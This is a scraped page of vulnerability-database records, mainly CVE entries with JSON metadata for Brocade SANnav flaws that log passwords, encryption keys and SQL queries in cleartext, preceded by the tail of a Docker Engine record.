      {
        "date": "2020-08-27T15:24:35",
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "date": "2020-07-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "168872"
      },
      {
        "date": "2020-06-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "date": "2020-06-02T14:15:10.770000",
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "date": "2020-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "date": "2023-03-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "date": "2024-11-21T05:01:11.040000",
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Docker Engine Input verification vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      }
    ],
    "trust": 0.6
  }
}

CVE-2025-12774 (GCVE-0-2025-12774)

Vulnerability from nvd – Published: 2026-02-03 01:28 – Updated: 2026-02-03 15:31
VLAI?
Title
SQL queries with sensitive information printed in logs with Brocade SANnav before 3.0
Summary
A vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file. An attacker with access to Brocade SANnav supportsave file, could open the file and then obtain sensitive information such as details of database tables and encrypted passwords.
Severity ?
4.6 (Medium)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: SANnav before 3.0
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12774",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T15:26:15.893390Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T15:31:59.719Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "SANnav before 3.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eA vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file.\u003c/span\u003e\u0026nbsp;\u003cspan style=\"background-color: transparent;\"\u003eAn attacker with access to Brocade SANnav supportsave file, could open the file and  then obtain sensitive information such as details of database tables and encrypted passwords.\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file.\u00a0An attacker with access to Brocade SANnav supportsave file, could open the file and  then obtain sensitive information such as details of database tables and encrypted passwords."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:57:22.992Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36848"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "SQL queries with sensitive information printed in logs with Brocade SANnav before 3.0",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12774",
    "datePublished": "2026-02-03T01:28:43.430Z",
    "dateReserved": "2025-11-05T20:07:09.482Z",
    "dateUpdated": "2026-02-03T15:31:59.719Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12773 (GCVE-0-2025-12773)

Vulnerability from nvd – Published: 2026-02-03 00:38 – Updated: 2026-02-03 20:46
VLAI?
Title
Plain password is generated in the audit logs while executing update-reports-purge-settings.sh script with Brocade SANnav before 2.4.0a
Summary
A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs. The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.
Severity ?
7.1 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-209 - Generation of Error Message Containing Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before 2.4.0a
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12773",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T20:45:38.650203Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T20:46:49.012Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before 2.4.0a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eA vulnerability in \u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003eupdate-reports-purge-settings.sh\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003e script logging for \u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs.\u003c/span\u003e\u0026nbsp;\u003cspan style=\"background-color: transparent;\"\u003eThe vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs.\u00a0The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-209",
              "description": "CWE-209 Generation of Error Message Containing Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:58:46.979Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36847"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Plain password is generated in the audit logs while executing update-reports-purge-settings.sh script with Brocade SANnav before 2.4.0a",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12773",
    "datePublished": "2026-02-03T00:38:08.909Z",
    "dateReserved": "2025-11-05T20:06:40.271Z",
    "dateUpdated": "2026-02-03T20:46:49.012Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12772 (GCVE-0-2025-12772)

Vulnerability from nvd – Published: 2026-02-02 22:41 – Updated: 2026-02-04 16:53
VLAI?
Title
Plaintext Switch admin login password is seen in Brocade SANnav support save
Summary
Brocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs. When OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password.
Severity ?
8.5 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12772",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T15:46:39.820278Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T16:53:20.826Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eWhen OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password.\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "Brocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs.\n\nWhen OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "LOW",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:59:41.935Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36846"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Plaintext Switch admin login password is seen in Brocade SANnav support save",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12772",
    "datePublished": "2026-02-02T22:41:13.921Z",
    "dateReserved": "2025-11-05T20:05:22.781Z",
    "dateUpdated": "2026-02-04T16:53:20.826Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12680 (GCVE-0-2025-12680)

Vulnerability from nvd – Published: 2026-02-02 20:50 – Updated: 2026-02-03 15:35
VLAI?
Title
Brocade SANnav DataBase plaintext password is logged in failover logs (CVE-2025-12680)
Summary
Brocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password.
Severity ?
6 (Medium)
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-256 - Plaintext Storage of a Password
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before Brocade SANnav 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12680",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T15:34:36.683547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T15:35:13.850Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before Brocade SANnav 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover.  The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password. \u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "Brocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover.  The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 6,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-256",
              "description": "CWE-256: Plaintext Storage of a Password",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T02:01:06.938Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36844"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Brocade SANnav DataBase plaintext password is logged in failover logs (CVE-2025-12680)",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12680",
    "datePublished": "2026-02-02T20:50:29.756Z",
    "dateReserved": "2025-11-03T23:43:51.547Z",
    "dateUpdated": "2026-02-03T15:35:13.850Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12679 (GCVE-0-2025-12679)

Vulnerability from nvd – Published: 2026-02-02 21:41 – Updated: 2026-02-04 16:54
VLAI?
Title
Plain text pbe key visible in audit log during Brocade SANnav migration from 2.4.0a to 3.0.0
Summary
A vulnerability in Brocade SANnav before 2.4.0b prints the Password-Based Encryption (PBE) key in plaintext in the system audit log file. The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the pbe key. Note: The vulnerability is only triggered during a migration and not in a new installation. The system audit logs are accessible only to a privileged user on the server. These audit logs are the local server VM’s audit logs and are not controlled by SANnav. These logs are only visible to the server admin of the host server and are not visible to the SANnav admin or any SANnav user.
Severity ?
7.1 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: SANnav before 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12679",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T15:46:50.496667Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T16:54:14.291Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "SANnav before 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA vulnerability in Brocade SANnav before 2.4.0b prints the \nPassword-Based Encryption (PBE) key in plaintext in the system audit log\n file. The vulnerability could allow a remote authenticated attacker \nwith access to the audit logs to access the pbe key.\u003c/p\u003e\u003cp\u003eNote: The vulnerability is only triggered during a migration and not \nin a new installation. The system audit logs are accessible only to a \nprivileged user on the server.\u003c/p\u003e\n\n\u003cp\u003eThese audit logs are the local server VM\u2019s audit logs and are not \ncontrolled by SANnav. These logs are only visible to the server admin of\n the host server and are not visible to the SANnav admin or any SANnav \nuser.\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in Brocade SANnav before 2.4.0b prints the \nPassword-Based Encryption (PBE) key in plaintext in the system audit log\n file. The vulnerability could allow a remote authenticated attacker \nwith access to the audit logs to access the pbe key.\n\nNote: The vulnerability is only triggered during a migration and not \nin a new installation. The system audit logs are accessible only to a \nprivileged user on the server.\n\n\n\nThese audit logs are the local server VM\u2019s audit logs and are not \ncontrolled by SANnav. These logs are only visible to the server admin of\n the host server and are not visible to the SANnav admin or any SANnav \nuser."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T02:01:36.206Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36845"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Plain text pbe key visible in audit log during Brocade SANnav migration from 2.4.0a to 3.0.0",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12679",
    "datePublished": "2026-02-02T21:41:16.462Z",
    "dateReserved": "2025-11-03T23:43:20.197Z",
    "dateUpdated": "2026-02-04T16:54:14.291Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-28168 (GCVE-0-2022-28168)

Vulnerability from nvd – Published: 2022-06-27 17:52 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength.
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.470Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:20.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
        }
      ],
